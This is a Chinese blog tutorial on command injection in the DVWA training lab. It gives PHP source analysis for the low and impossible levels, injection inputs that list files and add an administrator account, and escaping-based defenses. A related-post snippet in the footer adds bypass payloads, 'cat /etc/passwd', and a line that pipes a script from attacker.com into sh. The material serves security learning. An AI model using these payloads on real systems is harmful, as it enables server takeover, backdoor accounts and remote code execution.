DVWA笔记(二)Command Injection(命令注入)

最新推荐文章于 2025-06-16 12:34:57 发布
最新推荐文章于 2025-06-16 12:34:57 发布
阅读量821 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: 命令注入 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45868644/article/details/119860591
本文详细介绍了Web命令注入的原理,包括如何利用管道符执行命令以及在不同操作系统中的命令执行方式。通过分析DVWA的四个等级示例,展示了从无过滤到高级过滤的防御措施,特别提到了最高级别防御中对IP的四段数字验证。同时,讨论了防御命令注入的方法,如使用Escapeshellcmd()和Escapeshellarg()函数,并针对可能出现的乱码问题给出了解决方案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

前言

DVWA四个等级:

  1. 没有做过滤
  2. 做了基础过滤(中级)
    设置了命令黑名单’&&‘跟’;'过滤了
  3. 做了比较强的过滤
  4. 从逻辑上改了,将ip切割为四个部分,且都为数字

命令注入原理

原理: 通过web程序在服务器上拼接系统命令
危害: 如果在web应用使用的是root权限,则该漏洞可以导致攻击者在服务器上执行任意命令

一、注入流程

1.利用管道符 命令执行漏洞
在这里插入图片描述
执行ping命令以后查看目录

127.0.0.1|dir

2.命令管道符的补充:允许执行多条命令的符号

Windows系统支持的管道符如下:
" |" 前面命令输出结果作为后面命令的输入内容
"|| " 如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。
"& " 两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。
"&& " 如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。

Linux系统支持的管道符如下:
" ; " 执行完前面的语句再执行后面的语句、同时执行多条命令。
" | " 显示后面语句的执行结果。
" || " 当前面的语句执行出错时,执行后面的语句。
" & "两条命令都执行,如果前面的语句为假则执行执行后面的语句,前面的语句可真可假。
"&&"如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。

Linux系统还可以使用
分号(;)同时执行多条命令
还可以使用
重定向(>)在服务器中生成文件
或是使用(<)文件写入127.0.0.1&echo test>c:\1.txt
在c盘生成一个1.txt

二、源码分析

第一等级

<?php 

if( isset( $_POST[ 'Submit' ]  ) ) { 
    // Get input 
    $target = $_REQUEST[ 'ip' ];      //存放变量

    // Determine OS and execute the ping command. 
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {   
   // 判断这个服务器的操作系统是不是windows、确定操作系统并执行ping命令
        // Windows 
        $cmd = shell_exec( 'ping  ' . $target );  
} 
    else { 
        // *nix 
        $cmd = shell_exec( 'ping  -c 4 ' . $target ); 
    } 
    // Feedback for the end user 
    echo "<pre>{$cmd}</pre>"; 
} 
?>

Shell exec函数:让PHP的网页程序可以执行一些操作系统的命令、
如果不对用户输入的命令进行过滤,那么理论上就可以执行任意系统命令,
也就是相当于直接获得系统级的shell

命令执行语句

127.0.0.1 | net user
127.0.0.1 | net user test 123/add
127.0.0.1 | net localgroup admin istrators test/add

Windows下使用net user命令管理账户 net user 命令用法
1.查看所有用户 net user
2.查看单个用户信息net user 用户名
3.增加用户net user 用户名 密码 /add
4.删除用户net user 用户名 /delete
5.修改密码net user 用户名 *

最高等级

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $target = $_REQUEST[ 'ip' ];
    $target = stripslashes( $target );

    // Split the IP into 4 octects
    $octet = explode( ".", $target );

    // Check IF each octet is an integer
    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
        // If all 4 octets are int's put the IP back together.
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];
        is_numeric:用来判断后面的变量的值是否是一个数字
        对你输入的数据进行判断、首先分成四块、挨个判断、
        这每一块是不是一个数字、数的个数是不是四个。
        只要有一个条件不成立、下面的都不执行、只执行一个else输入一个echo
        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping  ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping  -c 4 ' . $target );
        }

        // Feedback for the end user
        echo "<pre>{$cmd}</pre>";
    }
    else {
        // Ops. Let the user name theres a mistake
        echo '<pre>ERROR: You have entered an invalid IP.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

防御

漏洞防御
Escapeshellcmd()(一丝key普)函数:把字符串中所有可能瞒过shell而去执行另外一个命令的字符转义,如管道符(|)、分号(;)、重定向(>)、从文件读入(<)等

Escapeshellarg()函数
在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符就可以安全地作为命令的参数

修改low级别网页文件

dvwa\vulnerabilities\exec\source\low.php进行测试
 $target = $_REQUEST[ 'ip' ];  
下面加$target = escapeshellcmd() ($target);

问题一:乱码

解决方法:将dvwa目录下includes文件夹中dvwaPage.inc.php文件的编码格式由utf8改为GBK

命令注入Command Injection
Tangyoo的博客
07-03 2996
命令注入攻击是指黑客通过把恶意代码输入一个输入机制(例如缺乏有效验证限制的表格域)来改变网页动态生成的内容的一种攻击手段。它允许攻击者执行系统命令,从而控制受影响的系统或服务器。命令注入攻击作为一种严重的网络安全威胁,要求我们在开发、部署和维护Web应用程序时始终保持高度的警惕性。通过实施全面的防御策略,包括加强输入验证、使用安全的函数和机制、实施白名单验证、遵循最小权限原则、进行安全配置与更新、实时监控与响应以及加强开发者教育与培训等,我们可以显著降低命令注入攻击的风险。
DVWA--Command Injection(命令注入)(全难度)
wwxxee
02-20 394
DVWACommand Injection(命令注入) 原理参考:网络安全笔记-99-渗透-OS命令注入 管道符 ”;“:分号。执行完前面的语句再执行后面的语句 ”|“:显示后面语句的执行结果,例如:ping 127.0.0.1| whoami ”||“:当前面的语句执行出错时执行后面的语句。例如:ping 1 || whoami ”&“:如果前面的语句为假则直接执行后面的语句,前面的语句可真可假 ”&&“:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句只能为真。
DVWA笔记:Command Injection
weixin_30917213的博客
08-11 186
命令注入 1.Low级别 <?php if(isset($_POST['Submit'])){ //Getinput $target=$_REQUEST['ip']; //DetermineOSandexecutethepingcommand. if(stristr(php_uname('s'...
Command Injection命令注入
weixin_43435891的博客
06-16 798
命令注入漏洞分析与实践 命令注入是一种严重的Web安全漏洞,攻击者能够通过提交恶意输入在服务器上执行系统命令。本文总结了命令注入的主要目的包括获取系统信息、文件操作、远程控制服务器、横向移动和提权尝试。介绍了典型的使用场景如表单参数拼接命令和调用系统工具接口。 文中详细列举了Linux系统中常见的命令注入符号(如;、&&、|等)和攻击者常用的系统命令(whoami、cat /etc/passwd等)。最后提供了在DVWA靶场中的实践步骤,包括设置安全级别、正常输入测试以及执行命令注入的示例。
DVWA靶场系列(一)—— Command Injection命令注入
qq_45612828的博客
07-10 4882
DVWA靶场系列(一)—— Command Injection命令注入
Command Injection命令注入
热门推荐
kid的博客
05-06 2万+
Command Injection命令注入) 前言 主要集合dvwa命令注入进行学习 内容比较基础简单 练习 Low 可以看到这是一个可以输入ip,测试连通性的界面 我觉得这个看代码来审计就很清楚了,这里我们输入(这里是Linux系统)会与’ping -c 4’拼接在一起,然后当做命令执行…这就给了我们很大的操作空间 && 可以用来执行多条命令 可以看到这里我加上 &...
dvwa靶场command injection
最新发布
07-08
首先,用户的问题是关于DVWA中的命令注入漏洞测试。用户提到:“我想用户意图是在使用DVWA靶场时尝试进行命令注入Command Injection)攻击,可能是为了...引用来源:DVWA笔记Command Injection命令注入)。
DVWA靶场笔记命令注入原理
Alonegrief的博客
11-19 714
命令注入 原理:利用可以调用系统命令web应用,通过构造特殊命令字符串的方式,把恶意代码输入一个编辑域来改变网页动态生成的内容,最终实现本应在服务端才能工作的系统命令。 例子: 打开dvwa的靶场,把安全级别调为low级别的,打开Command Injection,要我们输入ip,ping命令操作 直接查看源码 发现: 获取post进来的数据直接进行一个系统的判断,这里输入的会(本次靶场是在win系统上面)与’ping’拼接在一起,然后通过当做命令执行,并且将完整的输出以字符串的方式返回输,所以我们
手工挖洞学习笔记dvwa命令执行漏洞/载入php反弹shell
AI_Jardon的博客
08-13 1478
命令执行漏洞 工具: (1)靶机:Metasploitable2 (2)nc (3)kali dvwa 代码审计:安全级别为low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Wi
4.Command Injection——High级别测试——小白笔记——DVWA
qwsn
11-14 1532
0x01:High测试 1.上源码: Command Injection Source <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = trim($_REQUEST[ 'ip' ]); // Set blacklist $substitutions = array( ...
Command Injection
m0_63521991的博客
11-14 293
"Command Injection"(命令注入),其目标是通过一个应用程序在主机操作系统上执行任意命令。当一个应用程序将用户提供的数据(如表单、cookies、HTTP头等)传递给系统shell时,就可能发生命令注入攻击。在这种攻击中,攻击者提供的操作系统命令通常会以该应用程序的权限执行。命令注入攻击主要是由于输入验证不足造成的。
DVWACommand Injection命令注入
Cwillchris的博客
10-28 2081
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、Low级 1、源码分析 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input //获取IP字段 $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping comman.
DVWA命令注入command injection
giun的博客
03-08 1313
一、什么是命令注入 1、概念 通过web应用程序在服务器上拼接系统命令。简单说就是注入命令是系统命令,而注入是靠连接来完成的。 常见的windows命令: ipconfig,查看本地网络 net user,查看系统用户 dir “./ ” 查看当前目录 等等 常见的命令拼接符有&amp;&amp;, &amp; ,|, || 、尝试low等级 输入127.0.0.1发现输出的内容就是在c...
DVWA_Command Injection(命令注入)
yaowink的博客
05-14 1022
命令注入是一个非常大的漏洞,基本上有这个漏洞,系统就可以很容易被拿下。 一、首先,进入DVWA Security 改impossible为Low并提交。 进入Command Injection页面 点击View Source查看源码,源码非常简单,就只有ping,没有任何过滤 在Command Injection页面输入127.0.0.1提交,会显示 输入127.0.0.1&&ipconfig会显示dvwa宿主机的ip地址和DNS 127.0.0.1后..
DVWA——Command Injection
小纯的博客
03-17 2057
DVWA——Command Injection <学习笔记> @[TOC]DVWA——Command Injection 什么是Command Injection? 一、什么是Command Injection、使用步骤 总结
DVWACommand Injection
过期的秋刀鱼
08-16 499
但仔细观察发现有一个过滤是’| ‘,这个过滤是加了空格的,说明这个过滤其实是没用的,只需要’|’后面直接加入参数,不保留空格,我们依然可以用这个命令连接符进行命令注入。加入了Anti-CSRF token,同时对参数ip进行了严格的限制,只有诸如“数字.数字.数字.数字”的输入才会被接收执行,因此不存在命令注入漏洞。’字符过滤掉了,但我们可以使用黑名单之外的命令连接符命令注入注入命令过程中,常常需要使用一些系统命令的拼接方式,以达到更多复杂功能的实现,尤其是存在限制的情况,运用好可用来绕过限制。
dvwa靶场Command Injectionmin命令注入
04-02
<think>嗯,用户想了解DVWA靶场中的Command Injection漏洞测试和利用方法,需要详细步骤和示例。首先,我得回忆一下DVWA的基本设置,尤其是命令注入的模块。用户可能已经知道DVWA是什么,但可能需要先登录到Low安全级别开始测试。 首先,命令注入通常发生在用户输入被拼接到系统命令中执行的情况下。在DVWACommand Injection模块,用户输入一个IP地址,然后系统执行ping命令。这时候,如果输入没有经过严格的过滤,攻击者可以注入额外的命令。 比如,在Low安全级别下,后端代码可能直接拼接用户输入的参数到ping命令中,而没有做任何过滤。这时候用户输入类似`127.0.0.1; ls`,分号后面的命令就会被执行。这时候需要给出具体的示例,比如如何利用不同的符号如`&&`、`|`或者`&`来注入命令。 接下来,不同安全级别的防护措施不同。比如Medium级别可能过滤了一些符号,但可能没有完全覆盖,这时候需要测试哪些符号被转义或过滤了。比如,可能过滤了`;`和`&&`,但`|`可能仍然可用,或者需要尝试其他绕过方法,比如用`%0a`(换行符)来分隔命令。 High级别的防护可能更严格,可能只允许特定的输入格式,比如限制输入为IP地址格式。这时候可能需要利用IP地址的格式特性,比如使用`127.0.0.1 || ls`,如果代码检查IP格式是否合法,但后面的命令仍然会被执行的话。或者,使用反引号执行命令,如`$(ls)`。 Impossible级别可能使用了白名单或其他彻底防护的方法,这时候基本无法注入,需要说明其防护机制,比如使用escapeshellarg函数处理参数。 在漏洞利用示例中,要分级别展示不同的注入方式,并说明如何通过Burp Suite这样的工具拦截请求,修改参数,或者直接在输入框中输入注入命令。还要注意不同操作系统下的命令差异,比如Windows和Linux的符号可能不同,但DVWA通常运行在Linux环境下。 另外,生成的相关问题需要考虑用户可能进一步想知道如何防御命令注入,或者DVWA其他漏洞模块的测试方法,比如SQL注入或XSS。还要注意提醒用户只在合法授权的环境下进行测试,避免法律问题。 现在需要确保回答结构清晰,步骤正确,示例准确,并且引用格式正确。要检查是否有遗漏的安全级别或常见绕过方法,比如使用反斜杠转义或者编码绕过过滤。同时,要确保给出的代码示例正确,比如PHP中可能存在漏洞的代码部分,以及防护措施如参数化执行或输入验证。</think># DVWA Command Injection漏洞测试与利用方法 ## 一、漏洞原理 命令注入漏洞产生于未正确过滤用户输入的情况下,攻击者通过拼接系统命令实现任意命令执行。DVWACommand Injection模块模拟了`ping`功能,其基础命令为: $$ ping -c 4 {user_input} $$ 当用户输入包含`;`、`&&`、`|`等命令分隔符时,可注入额外命令[^1]。 ## 安全测试步骤(分安全等级) ### 1. Low安全级别 **测试方法**: ```http POST /vulnerabilities/exec/ HTTP/1.1 Host: localhost ... ip=127.0.0.1;whoami&Submit=Submit ``` **注入示例**: - `127.0.0.1; ls /` 列出根目录 - `127.0.0.1 && cat /etc/passwd` 查看系统账户 ### 2. Medium安全级别 **过滤机制**: ```php $target = str_replace(';', '', $target); // 移除分号 ``` **绕过方法**: ```http ip=127.0.0.1%0aid && ping -c 4 127.0.0.1 ``` 使用换行符`%0a`或未过滤的`&`符号 ### 3. High安全级别 **防护代码**: ```php if( preg_match( '/^[0-9.]+$/i', $target ) ) // 限制数字和点号 ``` **绕过示例**: ```bash 127.0.0.1 || ls -al ``` 利用逻辑运算符绕过正则检测 ### 4. Impossible级别 **防护措施**: ```php $target = escapeshellarg($target); // 参数化处理 $cmd = shell_exec('ping -c 4 '.$target); ``` 此时无法进行命令注入 ## 三、漏洞利用演示 **Burp Suite拦截修改**: ```http POST /vulnerabilities/exec/ HTTP/1.1 ... ip=127.0.0.1;curl+http://attacker.com/shell.sh+|+sh ``` 该payload将下载并执行远程脚本 ## 四、防御方案 1. 使用`exec($command, $output)`替代直接命令拼接 2. 实施白名单验证: ```php if (!preg_match('/^[0-9.]+$/', $ip)) { die("Invalid IP format"); } ``` 3. 参数化处理: ```php $clean_ip = escapeshellarg($_POST['ip']); ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值